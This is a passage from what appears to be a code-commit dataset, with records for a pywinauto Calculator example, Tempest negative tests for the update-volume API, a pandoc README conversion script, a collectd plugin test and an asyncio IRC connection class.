through the Desktop object only.
Minimized Calculator is a process in a "Suspended" state.
But it can be restored with a trick for the invisible main window.
"""
from pywinauto import Desktop, Application
app = Application(backend="uia").start('calc.exe')
dlg = Desktop(backend="uia").Calculator
dlg.type_keys('2*3=')
dlg.print_control_identifiers()
dlg.minimize()
Desktop(backend="uia").window(title='Calculator', visible_only=False).restore()
|
<commit_before><commit_msg>Add an example for Win10 version of Calculator.<commit_after>"""
Example script for Calculator on Windows 10
Requirements:
- Windows 10
- pywinauto 0.6.1+
Win10 version of Calculator is very specific. A few different processes (!)
own different windows and controls, so the full hierarchy can be accessed
through the Desktop object only.
Minimized Calculator is a process in a "Suspended" state.
But it can be restored with a trick for the invisible main window.
"""
from pywinauto import Desktop, Application
app = Application(backend="uia").start('calc.exe')
dlg = Desktop(backend="uia").Calculator
dlg.type_keys('2*3=')
dlg.print_control_identifiers()
dlg.minimize()
Desktop(backend="uia").window(title='Calculator', visible_only=False).restore()
|
|
7ef0b8f1246074cf78c94314aab4f804be01a1e7
|
tempest/api/compute/admin/test_volumes_negative.py
|
tempest/api/compute/admin/test_volumes_negative.py
|
# Copyright 2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest import config
from tempest.lib import exceptions as lib_exc
from tempest import test
CONF = config.CONF
class VolumesAdminNegativeTest(base.BaseV2ComputeAdminTest):
@classmethod
def skip_checks(cls):
super(VolumesAdminNegativeTest, cls).skip_checks()
if not CONF.service_available.cinder:
skip_msg = ("%s skipped as Cinder is not available" % cls.__name__)
raise cls.skipException(skip_msg)
@classmethod
def setup_clients(cls):
super(VolumesAdminNegativeTest, cls).setup_clients()
cls.servers_admin_client = cls.os_adm.servers_client
@classmethod
def resource_setup(cls):
super(VolumesAdminNegativeTest, cls).resource_setup()
cls.server = cls.create_test_server(wait_until='ACTIVE')
@test.idempotent_id('309b5ecd-0585-4a7e-a36f-d2b2bf55259d')
def test_update_attached_volume_with_nonexistent_volume_in_uri(self):
volume = self.create_volume()
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound,
self.servers_admin_client.update_attached_volume,
self.server['id'], nonexistent_volume,
volumeId=volume['id'])
@test.idempotent_id('7dcac15a-b107-46d3-a5f6-cb863f4e454a')
def test_update_attached_volume_with_nonexistent_volume_in_body(self):
volume = self.create_volume()
self.attach_volume(self.server, volume)
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.BadRequest,
self.servers_admin_client.update_attached_volume,
self.server['id'], volume['id'],
volumeId=nonexistent_volume)
|
Add negative tests about update-volume API
|
Add negative tests about update-volume API
As the following part of API-WG guideline[1],
If a request contains a reference to a nonexistent resource in the
body (not URI), the code should be 400 Bad Request. Do not use 404
NotFound because :rfc:`7231#section-6.5.4` (section 6.5.4) mentions
the origin server did not find a current representation for the
target resource for 404 and representation for the target resource
means a URI
Nova should return a NotFound(404) on this first test case, but it
should return a BadRequest response(400) in this second case, because
the second volume id is specified in a request body.
[1]: https://github.com/openstack/api-wg/blob/master/guidelines/http.rst#failure-code-clarifications
Depends-On: Ib781b116f5af713d64b5880858cc4f81c3da3977
Related-Bug: #1629110
Change-Id: I409c4fd53e272f6b15fb2a34068e3d003317290e
|
Python
|
apache-2.0
|
cisco-openstack/tempest,masayukig/tempest,openstack/tempest,Juniper/tempest,vedujoshi/tempest,openstack/tempest,cisco-openstack/tempest,masayukig/tempest,vedujoshi/tempest,Juniper/tempest
|
Add negative tests about update-volume API
As the following part of API-WG guideline[1],
If a request contains a reference to a nonexistent resource in the
body (not URI), the code should be 400 Bad Request. Do not use 404
NotFound because :rfc:`7231#section-6.5.4` (section 6.5.4) mentions
the origin server did not find a current representation for the
target resource for 404 and representation for the target resource
means a URI
Nova should return a NotFound(404) on this first test case, but it
should return a BadRequest response(400) in this second case, because
the second volume id is specified in a request body.
[1]: https://github.com/openstack/api-wg/blob/master/guidelines/http.rst#failure-code-clarifications
Depends-On: Ib781b116f5af713d64b5880858cc4f81c3da3977
Related-Bug: #1629110
Change-Id: I409c4fd53e272f6b15fb2a34068e3d003317290e
|
# Copyright 2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest import config
from tempest.lib import exceptions as lib_exc
from tempest import test
CONF = config.CONF
class VolumesAdminNegativeTest(base.BaseV2ComputeAdminTest):
@classmethod
def skip_checks(cls):
super(VolumesAdminNegativeTest, cls).skip_checks()
if not CONF.service_available.cinder:
skip_msg = ("%s skipped as Cinder is not available" % cls.__name__)
raise cls.skipException(skip_msg)
@classmethod
def setup_clients(cls):
super(VolumesAdminNegativeTest, cls).setup_clients()
cls.servers_admin_client = cls.os_adm.servers_client
@classmethod
def resource_setup(cls):
super(VolumesAdminNegativeTest, cls).resource_setup()
cls.server = cls.create_test_server(wait_until='ACTIVE')
@test.idempotent_id('309b5ecd-0585-4a7e-a36f-d2b2bf55259d')
def test_update_attached_volume_with_nonexistent_volume_in_uri(self):
volume = self.create_volume()
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound,
self.servers_admin_client.update_attached_volume,
self.server['id'], nonexistent_volume,
volumeId=volume['id'])
@test.idempotent_id('7dcac15a-b107-46d3-a5f6-cb863f4e454a')
def test_update_attached_volume_with_nonexistent_volume_in_body(self):
volume = self.create_volume()
self.attach_volume(self.server, volume)
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.BadRequest,
self.servers_admin_client.update_attached_volume,
self.server['id'], volume['id'],
volumeId=nonexistent_volume)
|
<commit_before><commit_msg>Add negative tests about update-volume API
As the following part of API-WG guideline[1],
If a request contains a reference to a nonexistent resource in the
body (not URI), the code should be 400 Bad Request. Do not use 404
NotFound because :rfc:`7231#section-6.5.4` (section 6.5.4) mentions
the origin server did not find a current representation for the
target resource for 404 and representation for the target resource
means a URI
Nova should return a NotFound(404) on this first test case, but it
should return a BadRequest response(400) in this second case, because
the second volume id is specified in a request body.
[1]: https://github.com/openstack/api-wg/blob/master/guidelines/http.rst#failure-code-clarifications
Depends-On: Ib781b116f5af713d64b5880858cc4f81c3da3977
Related-Bug: #1629110
Change-Id: I409c4fd53e272f6b15fb2a34068e3d003317290e<commit_after>
|
# Copyright 2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest import config
from tempest.lib import exceptions as lib_exc
from tempest import test
CONF = config.CONF
class VolumesAdminNegativeTest(base.BaseV2ComputeAdminTest):
@classmethod
def skip_checks(cls):
super(VolumesAdminNegativeTest, cls).skip_checks()
if not CONF.service_available.cinder:
skip_msg = ("%s skipped as Cinder is not available" % cls.__name__)
raise cls.skipException(skip_msg)
@classmethod
def setup_clients(cls):
super(VolumesAdminNegativeTest, cls).setup_clients()
cls.servers_admin_client = cls.os_adm.servers_client
@classmethod
def resource_setup(cls):
super(VolumesAdminNegativeTest, cls).resource_setup()
cls.server = cls.create_test_server(wait_until='ACTIVE')
@test.idempotent_id('309b5ecd-0585-4a7e-a36f-d2b2bf55259d')
def test_update_attached_volume_with_nonexistent_volume_in_uri(self):
volume = self.create_volume()
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound,
self.servers_admin_client.update_attached_volume,
self.server['id'], nonexistent_volume,
volumeId=volume['id'])
@test.idempotent_id('7dcac15a-b107-46d3-a5f6-cb863f4e454a')
def test_update_attached_volume_with_nonexistent_volume_in_body(self):
volume = self.create_volume()
self.attach_volume(self.server, volume)
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.BadRequest,
self.servers_admin_client.update_attached_volume,
self.server['id'], volume['id'],
volumeId=nonexistent_volume)
|
Add negative tests about update-volume API
As the following part of API-WG guideline[1],
If a request contains a reference to a nonexistent resource in the
body (not URI), the code should be 400 Bad Request. Do not use 404
NotFound because :rfc:`7231#section-6.5.4` (section 6.5.4) mentions
the origin server did not find a current representation for the
target resource for 404 and representation for the target resource
means a URI
Nova should return a NotFound(404) on this first test case, but it
should return a BadRequest response(400) in this second case, because
the second volume id is specified in a request body.
[1]: https://github.com/openstack/api-wg/blob/master/guidelines/http.rst#failure-code-clarifications
Depends-On: Ib781b116f5af713d64b5880858cc4f81c3da3977
Related-Bug: #1629110
Change-Id: I409c4fd53e272f6b15fb2a34068e3d003317290e# Copyright 2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest import config
from tempest.lib import exceptions as lib_exc
from tempest import test
CONF = config.CONF
class VolumesAdminNegativeTest(base.BaseV2ComputeAdminTest):
@classmethod
def skip_checks(cls):
super(VolumesAdminNegativeTest, cls).skip_checks()
if not CONF.service_available.cinder:
skip_msg = ("%s skipped as Cinder is not available" % cls.__name__)
raise cls.skipException(skip_msg)
@classmethod
def setup_clients(cls):
super(VolumesAdminNegativeTest, cls).setup_clients()
cls.servers_admin_client = cls.os_adm.servers_client
@classmethod
def resource_setup(cls):
super(VolumesAdminNegativeTest, cls).resource_setup()
cls.server = cls.create_test_server(wait_until='ACTIVE')
@test.idempotent_id('309b5ecd-0585-4a7e-a36f-d2b2bf55259d')
def test_update_attached_volume_with_nonexistent_volume_in_uri(self):
volume = self.create_volume()
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound,
self.servers_admin_client.update_attached_volume,
self.server['id'], nonexistent_volume,
volumeId=volume['id'])
@test.idempotent_id('7dcac15a-b107-46d3-a5f6-cb863f4e454a')
def test_update_attached_volume_with_nonexistent_volume_in_body(self):
volume = self.create_volume()
self.attach_volume(self.server, volume)
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.BadRequest,
self.servers_admin_client.update_attached_volume,
self.server['id'], volume['id'],
volumeId=nonexistent_volume)
|
<commit_before><commit_msg>Add negative tests about update-volume API
As stated in the following part of the API-WG guideline[1]:
If a request contains a reference to a nonexistent resource in the
body (not URI), the code should be 400 Bad Request. Do not use 404
NotFound because :rfc:`7231#section-6.5.4` (section 6.5.4) mentions
the origin server did not find a current representation for the
target resource for 404 and representation for the target resource
means a URI
Nova should return a NotFound (404) in the first test case, but a
BadRequest (400) in the second, because the second volume id is
specified in the request body.
[1]: https://github.com/openstack/api-wg/blob/master/guidelines/http.rst#failure-code-clarifications
Depends-On: Ib781b116f5af713d64b5880858cc4f81c3da3977
Related-Bug: #1629110
Change-Id: I409c4fd53e272f6b15fb2a34068e3d003317290e<commit_after># Copyright 2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest import config
from tempest.lib import exceptions as lib_exc
from tempest import test
CONF = config.CONF
class VolumesAdminNegativeTest(base.BaseV2ComputeAdminTest):
@classmethod
def skip_checks(cls):
super(VolumesAdminNegativeTest, cls).skip_checks()
if not CONF.service_available.cinder:
skip_msg = ("%s skipped as Cinder is not available" % cls.__name__)
raise cls.skipException(skip_msg)
@classmethod
def setup_clients(cls):
super(VolumesAdminNegativeTest, cls).setup_clients()
cls.servers_admin_client = cls.os_adm.servers_client
@classmethod
def resource_setup(cls):
super(VolumesAdminNegativeTest, cls).resource_setup()
cls.server = cls.create_test_server(wait_until='ACTIVE')
@test.idempotent_id('309b5ecd-0585-4a7e-a36f-d2b2bf55259d')
def test_update_attached_volume_with_nonexistent_volume_in_uri(self):
volume = self.create_volume()
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound,
self.servers_admin_client.update_attached_volume,
self.server['id'], nonexistent_volume,
volumeId=volume['id'])
@test.idempotent_id('7dcac15a-b107-46d3-a5f6-cb863f4e454a')
def test_update_attached_volume_with_nonexistent_volume_in_body(self):
volume = self.create_volume()
self.attach_volume(self.server, volume)
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.BadRequest,
self.servers_admin_client.update_attached_volume,
self.server['id'], volume['id'],
volumeId=nonexistent_volume)
|
|
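The 404-versus-400 distinction exercised by the two tests above can be made concrete with a small, self-contained sketch; the dictionary-backed handler and the names VOLUMES and update_attached_volume below are invented for illustration and are not part of Tempest or Nova.
# Hypothetical handler illustrating the API-WG rule: a nonexistent resource
# referenced in the URI yields 404 NotFound, while one referenced only in the
# request body yields 400 BadRequest.
VOLUMES = {"vol-1": {}, "vol-2": {}}

def update_attached_volume(uri_volume_id, body):
    if uri_volume_id not in VOLUMES:
        return 404  # missing resource named in the URI -> NotFound
    if body.get("volumeId") not in VOLUMES:
        return 400  # missing resource named only in the body -> BadRequest
    return 202  # accepted

assert update_attached_volume("no-such-volume", {"volumeId": "vol-1"}) == 404
assert update_attached_volume("vol-1", {"volumeId": "no-such-volume"}) == 400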
3bae553c1d5524ffa64cc1710574554a07a76357
|
register.py
|
register.py
|
# -*- coding: utf-8 -*-
#
# register.py
#
# purpose: Automagically creates a Rst README.txt
# author: Filipe P. A. Fernandes
# e-mail: ocefpaf@gmail
# web: http://ocefpaf.github.io/
# created: 10-Apr-2014
# modified: Fri 11 Apr 2014 12:10:43 AM BRT
#
# obs: https://coderwall.com/p/qawuyq
#
import os
import pandoc
home = os.path.expanduser("~")
pandoc.core.PANDOC_PATH = os.path.join(home, 'bin', 'pandoc')
doc = pandoc.Document()
doc.markdown = open('README.md').read()
with open('README.txt', 'w+') as f:
f.write(doc.rst)
# Some modifications are needed to README.txt before registering. Rendering this
# part useless...
if False:
os.system("python2 setup.py register")
os.remove('README.txt')
|
Convert README from markdown to RST.
|
Convert README from markdown to RST.
|
Python
|
mit
|
pyoceans/python-seawater,ocefpaf/python-seawater,ocefpaf/python-seawater,pyoceans/python-seawater
|
Convert README from markdown to RST.
|
# -*- coding: utf-8 -*-
#
# register.py
#
# purpose: Automagically creates a Rst README.txt
# author: Filipe P. A. Fernandes
# e-mail: ocefpaf@gmail
# web: http://ocefpaf.github.io/
# created: 10-Apr-2014
# modified: Fri 11 Apr 2014 12:10:43 AM BRT
#
# obs: https://coderwall.com/p/qawuyq
#
import os
import pandoc
home = os.path.expanduser("~")
pandoc.core.PANDOC_PATH = os.path.join(home, 'bin', 'pandoc')
doc = pandoc.Document()
doc.markdown = open('README.md').read()
with open('README.txt', 'w+') as f:
f.write(doc.rst)
# Some modifications are needed to README.txt before registering. Rendering this
# part useless...
if False:
os.system("python2 setup.py register")
os.remove('README.txt')
|
<commit_before><commit_msg>Convert README from markdown to RST.<commit_after>
|
# -*- coding: utf-8 -*-
#
# register.py
#
# purpose: Automagically creates a Rst README.txt
# author: Filipe P. A. Fernandes
# e-mail: ocefpaf@gmail
# web: http://ocefpaf.github.io/
# created: 10-Apr-2014
# modified: Fri 11 Apr 2014 12:10:43 AM BRT
#
# obs: https://coderwall.com/p/qawuyq
#
import os
import pandoc
home = os.path.expanduser("~")
pandoc.core.PANDOC_PATH = os.path.join(home, 'bin', 'pandoc')
doc = pandoc.Document()
doc.markdown = open('README.md').read()
with open('README.txt', 'w+') as f:
f.write(doc.rst)
# Some modifications are needed to README.txt before registering. Rendering this
# part useless...
if False:
os.system("python2 setup.py register")
os.remove('README.txt')
|
Convert README from markdown to RST.# -*- coding: utf-8 -*-
#
# register.py
#
# purpose: Automagically creates a Rst README.txt
# author: Filipe P. A. Fernandes
# e-mail: ocefpaf@gmail
# web: http://ocefpaf.github.io/
# created: 10-Apr-2014
# modified: Fri 11 Apr 2014 12:10:43 AM BRT
#
# obs: https://coderwall.com/p/qawuyq
#
import os
import pandoc
home = os.path.expanduser("~")
pandoc.core.PANDOC_PATH = os.path.join(home, 'bin', 'pandoc')
doc = pandoc.Document()
doc.markdown = open('README.md').read()
with open('README.txt', 'w+') as f:
f.write(doc.rst)
# Some modifications are needed to README.txt before registering. Rendering this
# part useless...
if False:
os.system("python2 setup.py register")
os.remove('README.txt')
|
<commit_before><commit_msg>Convert README from markdown to RST.<commit_after># -*- coding: utf-8 -*-
#
# register.py
#
# purpose: Automagically creates a Rst README.txt
# author: Filipe P. A. Fernandes
# e-mail: ocefpaf@gmail
# web: http://ocefpaf.github.io/
# created: 10-Apr-2014
# modified: Fri 11 Apr 2014 12:10:43 AM BRT
#
# obs: https://coderwall.com/p/qawuyq
#
import os
import pandoc
home = os.path.expanduser("~")
pandoc.core.PANDOC_PATH = os.path.join(home, 'bin', 'pandoc')
doc = pandoc.Document()
doc.markdown = open('README.md').read()
with open('README.txt', 'w+') as f:
f.write(doc.rst)
# Some modifications are needed to README.txt before registering. Rendering this
# part useless...
if False:
os.system("python2 setup.py register")
os.remove('README.txt')
|
|
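The conversion done by register.py can also be written without the old pyandoc wrapper. The sketch below is a modern equivalent, assuming the pypandoc package and a pandoc binary are installed; it is not part of the commit above.
# Sketch: convert README.md to reStructuredText with pypandoc (assumed installed).
import pypandoc

rst = pypandoc.convert_file('README.md', 'rst')
with open('README.txt', 'w') as f:
    f.write(rst)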
4f3d767ff899287252e8d3ebdbc0ee9a1a0b8d54
|
test/unit/test_fastly.py
|
test/unit/test_fastly.py
|
from ..helpers import *
class TestFastly(object):
def setup(self):
self.collectd = MagicMock()
self.modules = patch.dict('sys.modules', {'collectd': self.collectd})
self.modules.start()
from collectd_cdn import fastly
self.fastly = fastly.CdnFastly()
def teardown(self):
self.modules.stop()
|
Patch sys.modules for collectd import
|
Patch sys.modules for collectd import
So that we can test the plugin independently of collectd.
|
Python
|
mit
|
gds-operations/collectd-cdn
|
Patch sys.modules for collectd import
So that we can test the plugin independently of collectd.
|
from ..helpers import *
class TestFastly(object):
def setup(self):
self.collectd = MagicMock()
self.modules = patch.dict('sys.modules', {'collectd': self.collectd})
self.modules.start()
from collectd_cdn import fastly
self.fastly = fastly.CdnFastly()
def teardown(self):
self.modules.stop()
|
<commit_before><commit_msg>Patch sys.modules for collectd import
So that we can test the plugin independently of collectd.<commit_after>
|
from ..helpers import *
class TestFastly(object):
def setup(self):
self.collectd = MagicMock()
self.modules = patch.dict('sys.modules', {'collectd': self.collectd})
self.modules.start()
from collectd_cdn import fastly
self.fastly = fastly.CdnFastly()
def teardown(self):
self.modules.stop()
|
Patch sys.modules for collectd import
So that we can test the plugin independently of collectd.from ..helpers import *
class TestFastly(object):
def setup(self):
self.collectd = MagicMock()
self.modules = patch.dict('sys.modules', {'collectd': self.collectd})
self.modules.start()
from collectd_cdn import fastly
self.fastly = fastly.CdnFastly()
def teardown(self):
self.modules.stop()
|
<commit_before><commit_msg>Patch sys.modules for collectd import
So that we can test the plugin independently of collectd.<commit_after>from ..helpers import *
class TestFastly(object):
def setup(self):
self.collectd = MagicMock()
self.modules = patch.dict('sys.modules', {'collectd': self.collectd})
self.modules.start()
from collectd_cdn import fastly
self.fastly = fastly.CdnFastly()
def teardown(self):
self.modules.stop()
|
|
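The sys.modules patching used in this test generalises to any module that only exists inside a host process, as collectd's plugin API does here. A minimal standalone sketch with Python 3's unittest.mock, where the module name host_only is invented for illustration:
from unittest.mock import MagicMock, patch

fake = MagicMock()
with patch.dict('sys.modules', {'host_only': fake}):
    import host_only                 # resolved from sys.modules, so no ImportError
    host_only.register_read('demo')  # any attribute access just works on the mock
fake.register_read.assert_called_once_with('demo')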
0f20599968b2ab848f8e3fde912f8d0ecdfba509
|
asyncio_irc/connection.py
|
asyncio_irc/connection.py
|
import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send(b'USER meshybot 0 * :MeshyBot7')
self.send(b'NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
|
import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send('USER meshybot 0 * :MeshyBot7')
self.send('NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
# Cast to bytes
try:
message = message.encode()
except AttributeError:
pass
# Add line ending.
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
|
Allow Connection.send to take unicode message
|
Allow Connection.send to take unicode message
|
Python
|
bsd-2-clause
|
meshy/framewirc
|
import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send(b'USER meshybot 0 * :MeshyBot7')
self.send(b'NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
Allow Connection.send to take unicode message
|
import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send('USER meshybot 0 * :MeshyBot7')
self.send('NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
# Cast to bytes
try:
message = message.encode()
except AttributeError:
pass
# Add line ending.
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
|
<commit_before>import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send(b'USER meshybot 0 * :MeshyBot7')
self.send(b'NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
<commit_msg>Allow Connection.send to take unicode message<commit_after>
|
import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send('USER meshybot 0 * :MeshyBot7')
self.send('NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
# Cast to bytes
try:
message = message.encode()
except AttributeError:
pass
# Add line ending.
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
|
import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send(b'USER meshybot 0 * :MeshyBot7')
self.send(b'NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
Allow Connection.send to take unicode messageimport asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send('USER meshybot 0 * :MeshyBot7')
self.send('NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
# Cast to bytes
try:
message = message.encode()
except AttributeError:
pass
# Add line ending.
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
|
<commit_before>import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
